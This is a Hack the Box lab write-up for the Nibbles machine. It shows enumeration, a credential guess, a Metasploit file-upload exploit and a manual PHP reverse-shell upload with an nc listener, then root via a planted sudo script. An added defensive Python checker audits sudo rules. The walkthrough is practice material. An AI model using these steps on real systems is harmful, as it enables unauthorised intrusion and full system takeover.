Hack the Box: Nibbles

Enumeration

Nmap

The Nmap scan shows that OpenSSH is running on port 22 and an Apache HTTP server on port 80 on the target.

nmap -sVC -T4 -p- 10.10.10.75

HTTP

Browsing the website, we can see the text “Hello world!”.

Viewing the source of index.html reveals a comment referencing a /nibbleblog/ directory.

The page http://10.10.10.75/nibbleblog/ does not provide anything interesting.

Gobuster

Among other things, Gobuster found the directories content and admin, and an admin.php file, in the nibbleblog directory.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 10.10.10.75/nibbleblog -x php

From /nibbleblog/content/private/users.xml we can see a username admin.

At http://10.10.10.75/nibbleblog/admin.php we can see an admin login page.

Successfully logged in with credentials admin:nibbles.

From the admin settings, we can see that the Nibbleblog version is 4.0.3.

Exploitation

Metasploit

SearchSploit shows a “Nibbleblog 4.0.3 – Arbitrary File Upload” Metasploit module.

searchsploit nibbleblog

Fired up Metasploit, used the exploit, and set the required arguments.

msfconsole
use exploit/multi/http/nibbleblog_file_upload
set rhosts 10.10.10.75
set username admin
set password nibbles
set targeturi /nibbleblog
set lhost tun0
run

Gained a Meterpreter session as the user nibbler.

The user flag can be obtained from the directory: /home/nibbler.

Privilege Escalation

Switched to a bash shell and executed the command sudo -l. The output shows that the user nibbler can run the bash script /home/nibbler/personal/stuff/monitor.sh with sudo.

shell
/bin/bash -i
sudo -l

In /home/nibbler there is a zip file called personal.zip but no directory called “personal”. Unzipping personal.zip creates the directory personal/stuff and extracts personal/stuff/monitor.sh, a Linux server health-monitoring script.

Because /home/nibbler/personal/stuff/monitor.sh does not exist, nibbler can create a simple bash script at that path, and sudo will run it as root.

First, we make a directory /home/nibbler/personal/stuff.

cd /home/nibbler
mkdir personal && cd personal
mkdir stuff && cd stuff

Creating the script and executing it with sudo gives a root shell.

echo "bash -i" > monitor.sh
chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh

The root flag can be obtained from the directory: /root.
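The escalation above works because the sudo rule points at a path that does not exist, inside a directory nibbler can write to. As an added example (not part of the original writeup), the Python check below parses sudo -l output and flags rules whose target is missing or writable; the sample output, the NOPASSWD tag and the helper names are my own assumptions, and stage_example_fs() builds a throwaway tree so it runs offline.

```python
import os
import re
import tempfile

# Constructed sample of `sudo -l` output modelled on the rule the page
# describes; the NOPASSWD tag is an assumption, not copied from the box.
SAMPLE_SUDO_L = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) /usr/bin/apt-get update
"""

# One entry as printed by `sudo -l`: "(runas) [TAG: ...] command [args]".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")

def first_existing_ancestor(path: str) -> str:
    """Walk up until something exists; that is where a user would create the rest."""
    while not os.path.exists(path) and path != os.path.dirname(path):
        path = os.path.dirname(path)
    return path

def audit_sudo_rules(sudo_l_text: str, root: str = "/") -> list:
    """Return (command, issue, detail) per rule; issue is "missing", "writable"
    or "ok". Rule paths are absolute and are re-rooted under `root` so the
    check can run against a staged copy of a filesystem instead of the live one."""
    findings = []
    for line in sudo_l_text.splitlines():
        m = RULE_RE.match(line)
        if not m or m.group("cmd").strip() == "ALL":
            continue
        cmd = m.group("cmd").split()[0]
        real = os.path.join(root, cmd.lstrip("/"))
        if not os.path.exists(real):
            anc = first_existing_ancestor(real)
            if os.access(anc, os.W_OK):
                findings.append((cmd, "missing", f"{anc} is writable, so the target can be planted"))
            else:
                findings.append((cmd, "missing", f"nearest existing parent {anc} is not writable"))
        elif os.access(real, os.W_OK) or os.access(os.path.dirname(real), os.W_OK):
            findings.append((cmd, "writable", "target or its directory is writable by this user"))
        else:
            findings.append((cmd, "ok", "target exists and is not writable"))
    return findings

def stage_example_fs() -> str:
    """Stage a throwaway tree with only home/nibbler present (no personal/ dir)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "home", "nibbler"))
    return root
```

Run against a real host with root="/" as the unprivileged user; any "missing" or "writable" finding is a rule that needs a root-owned, non-writable target.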

Exploitation without Metasploit

Examining the Metasploit exploit code, we can see that the exploit uploads the payload through the configuration page of the My image plugin (admin.php – Plugins – My image – Configure).

At http://10.10.10.75/nibbleblog/admin.php we go to Plugins, My image and click Configure.

We then upload a PHP reverse shell file configured with the IP address of the Kali Linux machine and port 443.

Started up a Netcat listener on the Kali Linux machine.

nc -lvnp 443

Requesting the uploaded file triggers the payload:

curl 10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

The Netcat listener then receives a shell on the target.